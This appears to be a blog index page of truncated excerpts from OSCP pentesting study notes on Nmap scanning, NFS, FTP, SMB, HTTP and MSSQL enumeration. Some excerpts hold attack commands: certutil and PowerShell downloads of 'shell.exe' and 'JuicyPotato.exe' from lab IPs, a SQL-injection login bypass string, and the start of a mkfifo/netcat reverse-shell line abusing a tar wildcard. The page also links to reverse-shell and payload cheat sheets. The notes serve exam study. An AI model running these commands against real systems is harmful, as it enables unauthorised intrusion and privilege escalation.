MSSQL OSCP

MSSQL Services mssql-vulnerability - Nmap can be leveraged to scan MsSQL for Known vulnerabilities.   Example Syntax:   nmap -vv -sV -Pn -p [PORT] --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa [IP]   mssql-default -…

Comments Off on MSSQL OSCP

NFS OSCP

NMAP Script nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 nmap -p 111 --script nfs* 10.11.1.72 Mount NFS mkdir john Sudo mount -o nolock 10.1.1.72:/home/john john Showmount to show nfs shares Showmount…

Comments Off on NFS OSCP

OSCP links

IPPSEC Website https://ippsec.rocks/ Reverse Shell Cheat Sheet http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet Windows Privexc https://www.fuzzysecurity.com/tutorials/16.html Linux Privexc https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Payload https://github.com/swisskyrepo/PayloadsAllTheThings OSCP Notes Link https://www.notion.so/OSCP-Exam-Notes-EXAM_DATE-cb9d15436e4849339aaa35979d582735 Useful OSCP Commands https://medium.com/@falconspy/useful-oscp-notes-commands-d71b5eda7b02 IPEWorkshop https://medium.com/@falconspy/useful-oscp-notes-commands-d71b5eda7b02 OSCP Cheat Sheet https://github.com/avi7611/Oscp-Cheat-Sheet/tree/master/oscp

Comments Off on OSCP links

NMAP

  NMAP   Scan all ports and output to file nmap -p- -sC -sV -o nmap.out  <IP Address>     TCP Scan all ports sudo nmap -sC -sS -p0-65535 <IP…

Comments Off on NMAP

Download Files Windows

Download Files Windows Download Files with Certutil certutil.exe -urlcache -f http://10.9.218.104/shell.exe shell.exe Using Powershell to download files to Windows powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.35/JuicyPotato.exe','C:\temp\JuicyPotato.exe')" Also Great resource https://lolbas-project.github.io/

Comments Off on Download Files Windows

FTP OSCP

# NMAP sudo nmap --script=ftp-anon -p 21 <IP Address> nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 192.168.1.1 # Start FTP using python sudo python -m pyftpdlib -p 21 Creating txt…

Comments Off on FTP OSCP

HTTP OSCP

Simple SQL Injection to try on login form admin:' OR '1'='1 Using Nmap to scan for http exploits sudo nmap --scripts=http-vul* -p 80 <IP Address> nmap -Pn -sV -sC -vvvvv…

Comments Off on HTTP OSCP

SMB OSCP

Use Nmap to Scan host for smb exploits sudo nmap --scripts=smb-vul* <IP Address> sudo nmap --script=smb-enum* <IP Address> nmap -v -p 139, 445 --script=smb-os-discovery 10.11.1.227 SMB Version Windows version CIFS…

Comments Off on SMB OSCP

Shells

The following is notes from my pentesting course for OSCP If there is a app using tar * you can do the following echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc…

Comments Off on Shells